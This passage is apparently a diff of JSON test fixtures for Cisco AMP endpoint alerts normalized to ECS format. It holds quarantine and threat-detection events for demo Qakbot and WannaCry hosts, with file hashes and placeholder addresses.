"W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204897366867977", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "file": { + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500214055Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6412604589194871000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6412604589194870787", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "file": { + "name": "QuotaGroup.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "hash": { + "sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "md5": "32c9e6737dbdcbfb7563a3f27e2b1571" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + 
"f5a171c879b90e77861daf19741b373646d791ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500216107Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6412604589194871000", + 
"category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412604589194870787", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "file": { + "name": "", + "path": "", + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500218150Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6412604589194871000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412604589194870786", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "file": { + "name": "QuotaGroup.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "hash": { + "sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "md5": "32c9e6737dbdcbfb7563a3f27e2b1571" + } + }, + "ecs": { + "version": 
"1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500220195Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6412604589194871000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412604589194870785", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "file": { + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" 
+ }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500222246Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6412604589194871000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + 
"connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "detection_id": "6412604589194870785", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500224289Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419239055241773000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419239055241773128", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 708, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": "4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T15:18:49.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], 
+ "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500226335Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1
b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419239055241773000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419239055241773128", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:18:48.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500228382Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419239050946806000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419239046651838535", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": 
"2021-09-12T17:31:54.500230510Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419229335730782000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 
3221225524 + }, + "detection_id": "6419229331435814971", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500232553Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
